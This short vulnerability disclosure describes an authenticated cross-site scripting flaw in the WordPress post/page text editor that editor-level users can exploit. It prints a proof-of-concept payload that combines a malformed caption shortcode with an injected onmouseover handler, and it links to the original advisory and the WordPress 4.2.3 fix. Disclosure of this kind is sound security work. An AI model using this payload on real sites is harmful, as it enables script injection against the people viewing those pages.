Authenticated Cross-Site Scripting (XSS) in post/page (text editor mode). Editor user and up.
<a href="[caption code=">]</a><a title=" onmouseover=alert('test') ">link</a>
klikki.fi/adv/wordpress3.html
twitter.com/klikkioy/status/624264122570526720
wordpress.org/news/2015/07/wordpress-4-2-3/